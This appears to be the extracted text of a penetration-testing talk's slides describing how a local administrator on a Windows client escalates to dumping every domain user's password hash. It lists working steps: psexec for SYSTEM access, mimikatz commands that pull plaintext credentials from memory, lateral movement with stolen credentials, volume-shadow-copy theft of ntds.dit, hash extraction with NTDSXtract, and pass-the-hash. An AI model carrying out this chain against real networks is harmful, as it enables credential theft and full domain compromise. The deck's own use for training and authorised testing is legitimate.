Author: Riyaz Walikar

1. The Fall of a Domain
LOCAL ADMIN TO DOMAIN USER HASHES
Riyaz Walikar

2. Disclaimer
 It was far more painstaking and complicated than
this!
 Demo setup to show execution path
 All the commands were actually used in the pentest
 Please do not try this on your office/corporate
environment without written permission

3. Please exercise caution!

4. The story so far
 Remote RDP access to a machine on the client
network via VPN
 Local Administrator rights to simulate an employee
 User is a limited domain user
 Domain controller on the same network, reachable
with LDAP services running

5. Visually. This.

6. Local Admin eh?
 Locally logged in as TARDISfwhite
 Domain limited user but local admin
 Other users connected? [Task Manager > Users]
 Found another user connected to our system via
RDP –sweet! (possibly domain admin )
 Need system privs! Any ideas?

7. Think Sysinternals!
 psexec –s –i cmd.exe

8. Dump connected user credentials
 mimikatz – Benjamin Delpy
 Extracts plaintext passwords from memory
 Wdigest, tspkg, kerberos and many more
 mimikatz
 privilege::debug
 token::elevate
 sekurlsa::logonPasswords

9. Windows (In)Security?

10. Now what?
http://gapingvoid.com/2008/06/13/now-what/

11. Remote CMD anyone?
 RDP directly!
 Lets be discreet 
 psexec -s –u TARDISatomboy 10.10.10.1 cmd.exe
 Game already over!
 Instead RDP with user credentials and present
report

13. Lets grab some hashes 
 Active Directory stores user information in
%systemroot%ntdsntds.dit
 Locked during system usage
 ntdsutil + snapshot = backup (> Windows 2008)
 vssadmin create shadow /for=C: (> Windows 2003)

14. Lets grab some hashes 
 backup readable by nt authoritysystem and
administrators
 We need the ntds.dit and SYSTEM files
 cd / dir /other inbuilt cmd commands do not work
on unmounted volume shadow copies
 copy works!

15. Core files needed

16. NTDS.dit structure parse?
 NTDSXtract - A framework for offline forensic
analysis of ntds.dit
 Need the libesedb module as well
 libesedb and creddump in ntds_dump_hashes.zip
 wget to a linux box (Kali is a good choice)

17. get framework + compile + make + run
 wget
http://ntdsxtract.com/downloads/ntdsxtract/ntdsxt
ract_v1_0.zip
 wget
http://ntdsxtract.com/downloads/ntds_dump_hash
.zip
 unzip both

18. get framework + compile + make + run
 cd ntds_dump_hash/libesedb
 ./configure && make
 cd libesedb/esedbtools
 ./esedbexport -l /tmp/ntds.log <ntds.dit>

19. Yay!
 python ../../ntdsxtract/dsusers.py datatable
link_table --passwordhashes <system_file> –
passwordhistory <system_file>
 Cleanup the output with ntdstopwdump.py
(https://raw.github.com/inquisb/miscellaneous/mas
ter/ntdstopwdump.py)

20. Now what?
http://gapingvoid.com/2008/06/13/now-what/

21. Pass the hash / Password Cracking!
 Use the Windows Credentials Editor – Amplia
Security
 Password Cracking >> Humla perhaps 

22. References
 http://blog.gentilkiwi.com/mimikatz
 http://www.ampliasecurity.com/research/wcefaq.ht
ml
 http://bernardodamele.blogspot.in/2011/12/dumpwindows-password-hashes_16.html

23. Thank you
riyazwalikar@gmail.com
http://www.riyazwalikar.com